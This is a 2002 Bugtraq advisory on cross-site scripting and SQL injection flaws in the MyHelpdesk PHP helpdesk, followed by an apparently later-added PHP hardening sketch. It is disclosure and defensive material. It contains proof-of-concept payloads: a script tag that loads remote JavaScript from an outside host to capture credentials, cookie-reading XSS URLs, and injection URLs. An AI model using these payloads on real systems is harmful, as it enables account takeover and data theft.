Bugtraq mailing list archives

[ARL02-A15] Multiple Security Issues in MyHelpdesk


From: Ahmet Sabri ALPER <s_alper () hotmail com>
Date: 10 Jun 2002 11:50:47 -0000



+/--------\-------- ALPER Research Labs ------/--------/+
+/---------\-------  Security Advisory  -----/---------/+
+/----------\------    ID: ARL02-A15    ----/----------/+
+/-----------\----- salper () olympos org  ---/-----------/+


Advisory Information
--------------------
Name               : Multiple Security Issues in MyHelpdesk
Software Package   : MyHelpdesk
Vendor Homepage    : http://myhelpdesk.sourceforge.net/
Vulnerable Versions: v20020509 and older
Platforms          : OS Independent, PHP
Vulnerability Type : Input Validation Error
Vendor Contacted   : 01/06/2002
Vendor Replied     : 02/06/2002
Prior Problems     : N/A
Current Version    : v20020509 (vulnerable)


Summary
-------
MyHelpdesk is a PHP/MySQL Helpdesk system based on the 
OneOrZero Helpdesk but with a different set of features. 
The system is appropriate for the Support Desk of small 
organizations.

Multiple Cross Site Scripting and SQL injection problems 
exist within "MyHelpdesk".


Details
-------
1. When a support assistant creates a new ticket, the Title 
and Description input is not filtered for malicious code, so 
both fields allow Cross Site Scripting attacks, which may give 
any supporter the administrator password if the issue is 
exploited correctly.
Proof-of-concept input for Title and/or Description fields:
<script src="http://forum.olympos.org/f.js";>Alper</script>


2. Maliciously crafted links from third party sites may allow 
Cross Site Scripting attacks. This can be accomplished via three 
different functions of index.php:
http://[TARGET]/supporter/index.php?t=tickettime&id=<script>alert(document.cookie)</script>
http://[TARGET]/supporter/index.php?t=ticketfiles&id=<script>alert(document.cookie)</script>
http://[TARGET]/supporter/index.php?t=updateticketlog&id=<script>alert(document.cookie)</script>

3. When any ticket is edited, the update section is also 
not filtered correctly and may carry malicious code.

4. Three different functions of "index.php" pass user input 
directly into the SQL query. This makes it possible for 
attackers to launch SQL injection attacks.

http://[TARGET]/supporter/index.php?t=detailticket&id=root%20me
http://[TARGET]/supporter/index.php?t=editticket&id=got%20root
http://[TARGET]/supporter/index.php?t=updateticketlog&id=without%20me


Solution
--------
The vendor stated in his reply that MyHelpDesk was 
designed for internal use for small organizations, and 
such issues would not do much harm for internal 
systems.

Workaround:
Filter the $id, $title and $description variables for 
malicious code before they reach the SQL query or the HTML output.
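The workaround above, worked through as an added PHP sketch (this is illustrative code written for this posting, not MyHelpdesk's own source): the ticket id from the index.php query string is forced to an integer and bound as a query parameter, and the title/description fields are HTML-encoded at output time. The table and column names (tickets, id, title, description) and the $db connection are assumptions.

```php
<?php
// Added example, not MyHelpdesk code. Hardens the three points named in
// the advisory: $id (SQL injection and reflected XSS) and the stored
// ticket fields $title / $description (stored XSS).
declare(strict_types=1);

// The "id" parameter is only ever a ticket number, so anything that is
// not a plain decimal string is rejected outright. This closes the
// detailticket/editticket/updateticketlog injection paths and the
// tickettime/ticketfiles/updateticketlog reflected XSS in one place.
function sanitizeTicketId(mixed $raw): ?int
{
    if (!is_string($raw) && !is_int($raw)) {
        return null;
    }
    $s = (string) $raw;
    return ($s !== '' && ctype_digit($s)) ? (int) $s : null;
}

// Encode ticket text when it is rendered, not when it is stored: a
// <script> tag saved in the Title or Description then displays as text
// instead of executing for the supporter or administrator viewing it.
function htmlSafe(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Parameterised lookup: the id is bound as an integer and never becomes
// part of the SQL text. Table and column names are assumed.
function loadTicket(mysqli $db, int $id): ?array
{
    $stmt = $db->prepare('SELECT id, title, description FROM tickets WHERE id = ?');
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    return $row ?: null;
}

// $db is an existing mysqli connection (assumed to be set up elsewhere).
$id = sanitizeTicketId($_GET['id'] ?? null);
if ($id === null) {
    http_response_code(400);
    exit('Invalid ticket id.');   // never echo the rejected value back
}
$ticket = loadTicket($db, $id);
if ($ticket !== null) {
    echo '<h1>' . htmlSafe($ticket['title']) . '</h1>';
    echo '<p>' . htmlSafe($ticket['description']) . '</p>';
}
```

The same htmlSafe() call belongs around the ticket update log text (item 3 in the Details), which the advisory reports as unfiltered as well.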


Credits
-------
Discovered on 01, June, 2002 by 
Ahmet Sabri ALPER <salper () olympos org>
ALPER Research Labs.

The ALPER Research Labs. [ARL] workers are freelance 
security professionals and WhiteHat hackers. The ARL 
workers are available for hiring for legal jobs.
The ARL also supports the Open Software Community by detecting 
possible security issues in GPL or any other Public Licensed 
product.


References
----------
Product Web Page: http://myhelpdesk.sourceforge.net/
Olympos: http://www.olympos.org/

